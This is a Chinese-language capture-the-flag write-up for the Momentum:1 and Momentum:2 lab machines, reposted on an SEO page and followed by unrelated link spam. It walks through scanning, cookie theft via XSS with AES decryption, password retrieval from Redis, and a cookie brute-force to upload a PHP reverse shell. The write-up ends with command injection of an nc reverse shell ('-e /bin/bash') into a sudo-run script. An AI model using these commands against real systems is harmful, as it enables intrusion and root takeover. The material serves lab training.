当前位置: 首页 > wzjs >正文

北京旅游设计网站建设网页版哔哩哔哩

北京旅游设计网站建设,网页版哔哩哔哩,ppt图标网站链接怎么做,滁州网站建设工作室Momentum:1 具体流程 1、主机发现&端口扫描 nmap 192.168.31.157 -A -T4 开放端口22,80。 2、web信息收集 访问80端口。 目录扫描 dirsearch -u http://192.168.31.157/ 没什么收获,换字典or爆破/js二层目录,发现/js/main.js中提示两点&…

Momentum:1

具体流程

1、主机发现&端口扫描

nmap 192.168.31.157 -A -T4  

开放端口22,80。

2、web信息收集

访问80端口。

目录扫描

dirsearch -u http://192.168.31.157/

没什么收获,换字典or爆破/js二层目录,发现/js/main.js中提示两点:

  • window.location.href = "opus-details.php?id="+str

  • crypto-js,AES加密。

    var CryptoJS = require("crypto-js");
    var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
    console.log(decrypted.toString(CryptoJS.enc.Utf8));

'?id='老熟悉了是不是,这里可能有注入,sql or xss。

存在反射型xss。

这种反射型xss当下最多能够得到一个cookie。

回到crypto.js,百度得知这是一个JavaScript的加解密的工具包,支持多种算法:MD5、SHA1、AES等。这里明显就是AES解密,官方文档的解密代码如下:

var decrypted = CryptoJS.AES.decrypt(encrypted, "Secret Passphrase");

需要解密一串字符,已知加密字符串SecretPassphraseMomentum,那需要解密的密文是什么。目前得到的密文只有通过反射型xss获取得到的cookie值cookie=U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt

解密脚本如下:

<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>
<script>
​var encrypted = "U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt"var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");alert(decrypted.toString(CryptoJS.enc.Utf8));
​
</script>

得到一串密码auxerre-alienum##,ssh密码?

3、ssh登录

ssh auxerre@ip

pwd:auxerre-alienum##

get flag1!🎆

4、内网信息收集——提权

通过cat /etc/passwd知道还存在redis用户,查看开放端口,的确开放了6379,尝试redis客户端。

# 本地登录
redis-cli
# 查看一下数据库内存储的键
KEYS *
# get命令查看查询得到的键
GET rootpass

获取一个密码:m0mentum-al1enum##

尝试登录root用户。

get flag2!🎆

Momentum:2

具体流程

1、主机发现&端口扫描

nmap扫描攻击机同网段。nmap 192.168.56.0/24 -Pn

对目标机进行全面扫描,nmap 192.168.56.116 -A -T4,开放端口有22、80。

2、目录扫描

访问80端口的http服务。

目录扫描,dirsearch -u http://192.168.56.116/ -e*

3、文件上传

http://192.168.56.116/dashboard.html,文件上传功能页,测试发现txt文件可成功上传。

想办法上传php文件,通过抓包修改后缀名成功绕过(返回1则上传成功,0则上传失败),上传后保存到哪儿了?

~ Upload Your Research File about Owls这里提示上传文件至owls。果然在/owls/下发现我们上传的文件。

当前只是解决绕过后缀名限制成功上传了,但是无法利用。如何解决,如果有ajax.php代码就好了。dirsearch扫描备份文件,dirsearch -u http://192.168.56.116/ -f -e .php.bak,.zip,.tar,.7z

可以知道ajax.php的逻辑是满足以下两点则php成为白名单后缀:

  1. cookie值满足admin=&G6u@B6uDXMq&Ms+一个大写字母

  2. 请求体secure等于val1d

 //The boss told me to add one more Upper Case letter at the end of the cookieif(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
​//[+] Add if $_POST['secure'] == 'val1d'$valid_ext = array("pdf","php","txt");}else{
​$valid_ext = array("txt");}
​// Remember success upload returns 1 

bp爆破cookie最后一个大写字母,先构造好请求包:

POST /ajax.php HTTP/1.1
Host: 192.168.56.116
Content-Length: 6559
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzWblB0WbTHck2yPX
Accept: */*
Origin: http://192.168.56.116
Referer: http://192.168.56.116/dashboard.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Cookie: admin=&G6u@B6uDXMq&MsX
​
------WebKitFormBoundaryzWblB0WbTHck2yPX
Content-Disposition: form-data; name="secure"
​
val1d
------WebKitFormBoundaryzWblB0WbTHck2yPX
Content-Disposition: form-data; name="file"; filename="kali.php"
Content-Type: application/octet-stream
​
反弹shell内容
------WebKitFormBoundaryzWblB0WbTHck2yPX--

添加payload,进行爆破。

R时响应包返回1,表示上传成功。

上传成功。

反弹成功。

python3 -c 'import pty;pty.spawn("/bin/bash")'

4、内网信息收集

  1. athena和team-tasks两个用户

  2. athena家目录下存在password-reminder.txt,提示password : myvulnerableapp[Asterisk]

  3. user.txt,get flag 1。                                                                                                                 

  4. team-tasks家目录下存在两个文件note.txt和cookie-gen.py。                                                     

5、提权

登录到athena,密码经过测试是myvulnerableapp*(Asterisk是星号)

sudo -l,提示athena可以不需要密码以root权限执行cookie-gen.py。

cookie-gen.py内容如下:

import random
import os
import subprocess
​
print('~ Random Cookie Generation ~')
print('[!] for security reasons we keep logs about cookie seeds.')
chars = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'
​
seed = input("Enter the seed : ")
random.seed = seed
​
cookie = ''
for c in range(20):cookie += random.choice(chars)
​
print(cookie)
​
cmd = "echo %s >> log.txt" % seed
subprocess.Popen(cmd, shell=True)

常规思路是往这个脚本中写入恶意代码,但是这里没有权限。仔细看了代码知道构造cmd,也就是通过输入seed的值构造命令行。

;nc 192.168.56.109 8888 -e /bin/bash;

nc -lvvp 8888,成功反弹得到root权限,get flag2🎆


文章转载自:

http://oa26VNow.ntnmL.cn
http://F7kx506x.ntnmL.cn
http://PdghUIvz.ntnmL.cn
http://BSdN0oHx.ntnmL.cn
http://tWHijyh7.ntnmL.cn
http://QrHjAONk.ntnmL.cn
http://8s4P1wgN.ntnmL.cn
http://3gdrXUSe.ntnmL.cn
http://VFEGY6Wd.ntnmL.cn
http://t2V1irNo.ntnmL.cn
http://61u1A1x6.ntnmL.cn
http://36G28smn.ntnmL.cn
http://cXiWWwP2.ntnmL.cn
http://JFanjkdN.ntnmL.cn
http://FBAHQ4oH.ntnmL.cn
http://RFyulQ52.ntnmL.cn
http://ShdKtBVO.ntnmL.cn
http://q0TFAVhy.ntnmL.cn
http://hhRejRZP.ntnmL.cn
http://I5i6VlP6.ntnmL.cn
http://95xPmrlY.ntnmL.cn
http://CMx20Xq5.ntnmL.cn
http://KRSYx0Ya.ntnmL.cn
http://LkhlmiKm.ntnmL.cn
http://mCPu7FqM.ntnmL.cn
http://bttlQ0rm.ntnmL.cn
http://73oNjIxF.ntnmL.cn
http://Leze7kWw.ntnmL.cn
http://K4t8td3S.ntnmL.cn
http://5StYRrpX.ntnmL.cn
http://www.dtcms.com/wzjs/645263.html

相关文章:

  • 做网站是com还是cn好用三权重的网站做友链有好处没
  • 鞍山晟宇网站建设网站开发移动端网站
  • 廊坊关键词优化排名迈步者seo
  • 龙华做手机网站加强网站的建设工作
  • php网站开发cms最方便在线网站开发
  • 洛阳青峰做网站网站建设的费用报价
  • 重庆专业网站推广公司淘宝客网站免费建站
  • 哪个网站做图找图片怎么清空WordPress
  • 网站 建设 成品网页制作技术有哪些
  • 长春网站建设模板网站内容如何编辑软件
  • 深圳市住房和建设局领导班子成员谷歌seo网站推广
  • 玉林住房和建设厅网站现在还用dw做网站设计么
  • 事务所网站建设seo智能优化
  • 宣城网站开发宠物美容网站建设的目的
  • 惠州网站模板建站大千设计装饰有限公司
  • 做网站是数据库应该放在哪里软件开发培训机构网课
  • 八桂职教网技能大赛2023银川seo优化
  • 六安找人做网站级a做爰片免费视网站
  • 贵州建站互联网科技有限公司把WordPress搬家
  • o2o网站设计公司seo最新
  • 网站 网页制作wordpress自定义主题怎么拷过去
  • 大型的网站建设wordpress最好插件
  • 帝国cms 网站地图 自定义详情页设计模板图片
  • 网站设计seo东西湖注册公司
  • 百度推广移动端网站wordpress wp_loginout
  • 糖果网站建设策划书模板美橙建站怎么样
  • 个人网站建设详细教程台州建设网站制作
  • 江苏建设信息网站推广公司赚钱吗
  • 网页网站开发大概多少钱百度推广账户优化
  • 用php做电子商务网站跨境电商官方网址